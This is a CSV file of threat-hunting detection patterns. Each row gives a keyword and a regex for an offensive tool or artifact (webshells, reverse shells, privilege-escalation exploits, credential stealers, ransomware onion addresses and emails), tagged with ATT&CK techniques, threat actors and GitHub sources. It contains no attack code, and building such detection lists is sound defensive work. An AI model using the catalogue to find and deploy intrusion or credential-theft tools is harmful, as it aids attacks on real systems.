"*aniqfakhrull@gmail.com*",".{0,1000}aniqfakhrull\@gmail\.com.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#email","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","33887"
"*Ani-Shell | C0d3d by lionaneesh*",".{0,1000}Ani\-Shell\s\|\sC0d3d\sby\slionaneesh.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33888"
"*anonsurf.py*",".{0,1000}anonsurf\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1059 - T1078 - T1105 - T1110 - T1566","TA0002 - TA0008 - TA0009 - TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","N/A","10","52217","5629","2025-03-03T15:17:19Z","2020-04-11T09:21:31Z","33889"
"*ansible2john.py*",".{0,1000}ansible2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","33890"
"*anthemtotheego/Detect-Hooks*",".{0,1000}anthemtotheego\/Detect\-Hooks.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","N/A","10","10","158","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z","33891"
"*anthemtotheego/SharpSploitConsole*",".{0,1000}anthemtotheego\/SharpSploitConsole.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","33892"
"*antirez/hping*",".{0,1000}antirez\/hping.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","1","N/A","N/A","N/A","10","1533","341","2024-07-10T12:38:39Z","2012-06-13T17:41:54Z","33893"
"*AntivirusBypass.psm1*",".{0,1000}AntivirusBypass\.psm1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","33894"
"*antiword FUZZ*",".{0,1000}antiword\sFUZZ.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","33895"
"*antonioCoco/ConPtyShell*",".{0,1000}antonioCoco\/ConPtyShell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","33896"
"*antonioCoco/JuicyPotatoNG*",".{0,1000}antonioCoco\/JuicyPotatoNG.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","33897"
"*antonioCoco/RemotePotato0*",".{0,1000}antonioCoco\/RemotePotato0.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","1","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","33898"
"*antonioCoco/RoguePotato*",".{0,1000}antonioCoco\/RoguePotato.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","N/A","10","10","1081","131","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z","33899"
"*antonioCoco/RogueWinRM*",".{0,1000}antonioCoco\/RogueWinRM.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","1","N/A","N/A","10","8","788","107","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z","33900"
"*antonioCoco/RunasCs*",".{0,1000}antonioCoco\/RunasCs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","33901"
"*antonioCoco/SspiUacBypass*",".{0,1000}antonioCoco\/SspiUacBypass.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","33902"
"*antoniomika/sish*",".{0,1000}antoniomika\/sish.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","33903"
"*AntSword JSP*",".{0,1000}AntSword\sJSP.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#content","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","33904"
"*antSword/v2.0*",".{0,1000}antSword\/v2\.0.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#useragent","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","33905"
"*antSword/v2.1*",".{0,1000}antSword\/v2\.1.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#useragent","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","33906"
"*AntSwordProject/antSword*",".{0,1000}AntSwordProject\/antSword.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","1","N/A","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","33907"
"*anypotato.exe*",".{0,1000}anypotato\.exe.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","33916"
"*aoacugmutagkwctu.onion*",".{0,1000}aoacugmutagkwctu\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","33923"
"*aodkkagnadcbobfpggfnjeongemjbjca*",".{0,1000}aodkkagnadcbobfpggfnjeongemjbjca.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","33924"
"*AoratosWin*.zip*",".{0,1000}AoratosWin.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","33926"
"*AoratosWin.csproj*",".{0,1000}AoratosWin\.csproj.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","33927"
"*AoratosWin.exe*",".{0,1000}AoratosWin\.exe.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","33928"
"*AoratosWin.git*",".{0,1000}AoratosWin\.git.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","33929"
"*AoratosWin.sln*",".{0,1000}AoratosWin\.sln.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","33930"
"*AoratosWin_*.zip*",".{0,1000}AoratosWin_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","33931"
"*apache_felix_remote_shell*",".{0,1000}apache_felix_remote_shell.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","33932"
"*APC_Ijnect_Load.nim*",".{0,1000}APC_Ijnect_Load\.nim.{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","N/A","10","10","656","121","2025-02-18T14:31:45Z","2021-01-19T15:57:01Z","33933"
"*apedx765p-stoedx765re.jsedx765on*",".{0,1000}apedx765p\-stoedx765re\.jsedx765on.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","33935"
"*apex2john.py*",".{0,1000}apex2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","33936"
"*apfs_encrypted_volume_passwd.md*",".{0,1000}apfs_encrypted_volume_passwd\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","33937"
"*api.truesocks.net*",".{0,1000}api\.truesocks\.net.{0,1000}","offensive_tool_keyword","TrueSocks","Simple API for buying renting and managing proxies","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","Defense Evasion","https://github.com/c0dn/truesocks_rs","1","1","N/A","N/A","10","1","0","0","2023-05-09T01:00:05Z","2023-04-06T02:32:04Z","33947"
"*API::installHook() - Windows keyboard hook could not be installed!*",".{0,1000}API\:\:installHook\(\)\s\-\sWindows\skeyboard\shook\scould\snot\sbe\sinstalled!.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#content","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","33949"
"*api_username = """"redtiger1337""""*",".{0,1000}api_username\s\=\s\""redtiger1337\"".{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#content","N/A","9","","N/A","","","","33951"
"*APIHookInjectorBin.exe*",".{0,1000}APIHookInjectorBin\.exe.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","33953"
"*APIHookInjectorBin.log*",".{0,1000}APIHookInjectorBin\.log.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","#logfile","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","33954"
"*APIHookInjectorBin.pdb*",".{0,1000}APIHookInjectorBin\.pdb.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","33955"
"*APIHookInjectorBin.sln*",".{0,1000}APIHookInjectorBin\.sln.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","33956"
"*aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion*",".{0,1000}aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","33959"
"*aploium/shootback*",".{0,1000}aploium\/shootback.{0,1000}","offensive_tool_keyword","shootback","a reverse TCP tunnel let you access target behind NAT or firewall","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/aploium/shootback","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","962","234","2020-09-12T07:31:56Z","2016-04-28T15:12:36Z","33960"
"*apokryptein/secinject*",".{0,1000}apokryptein\/secinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/apokryptein/secinject","1","1","N/A","N/A","10","10","94","23","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z","33961"
"*apop2john.py*",".{0,1000}apop2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","33962"
"*App Proxy ExternalC2 POC by @_xpn_*",".{0,1000}App\sProxy\sExternalC2\sPOC\sby\s\@_xpn_.{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","0","#content","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","33963"
"*app.config['graph_spy_db_folder']*",".{0,1000}app\.config\[\'graph_spy_db_folder\'\].{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","#content","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","33964"
"*app.config['graph_spy_db_path']*",".{0,1000}app\.config\[\'graph_spy_db_path\'\].{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","#content","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","33965"
"*app.pentest-tools.com*",".{0,1000}app\.pentest\-tools\.com.{0,1000}","offensive_tool_keyword","pentest-tools.com","site often consulted by pentester","T1596 - T1592","TA0043","N/A","N/A","Reconnaissance","https://pentest-tools.com","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A","33966"
"*app/dllproxy.nim*",".{0,1000}app\/dllproxy\.nim.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","N/A","N/A","9","2","167","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z","33967"
"*app/dllproxy.nim*",".{0,1000}app\/dllproxy\.nim.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","N/A","9","1","10","0","2024-05-26T17:34:01Z","2024-03-15T15:15:45Z","33968"
"*'app_bound_encrypted_key' not found in Local State file*",".{0,1000}\'app_bound_encrypted_key\'\snot\sfound\sin\sLocal\sState\sfile.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","#content","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","33969"
"*APP_ENV_KEY = ""AutoExecByPassOpenBasedir""*",".{0,1000}APP_ENV_KEY\s\=\s\""AutoExecByPassOpenBasedir\"".{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","33970"
"*appadmin9090@proton.me*",".{0,1000}appadmin9090\@proton\.me.{0,1000}","offensive_tool_keyword","Dispossessor","email account used by the ransomware group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Ransomware","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","#email","N/A","10","10","N/A","N/A","N/A","N/A","33971"
"*appblock*wfpsessionmanager.obj*",".{0,1000}appblock.{0,1000}wfpsessionmanager\.obj.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. Management can include blocking or permiting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","N/A","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","33972"
